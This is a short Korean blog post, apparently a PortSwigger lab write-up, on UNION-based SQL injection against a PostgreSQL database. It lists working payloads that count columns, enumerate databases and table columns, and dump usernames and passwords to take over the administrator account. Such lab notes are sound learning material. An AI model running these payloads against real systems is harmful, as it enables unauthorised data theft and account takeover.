Union sql injection(non-Oracle)

동글래차·2024년 5월 8일
0

Portswigger

목록 보기
2/2

non-Oracle DB 서버에서 'administrator' 계정 탈취

  • postgres임
+UNION+SELECT+'1','1'-- # union select로 data 개수 확인
+Order+by 1,2 -- # order by로 data 개수 확인
+union+SELECT+'1',datname,'1'+FROM+pg_database--
+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
profile
동글동글

0개의 댓글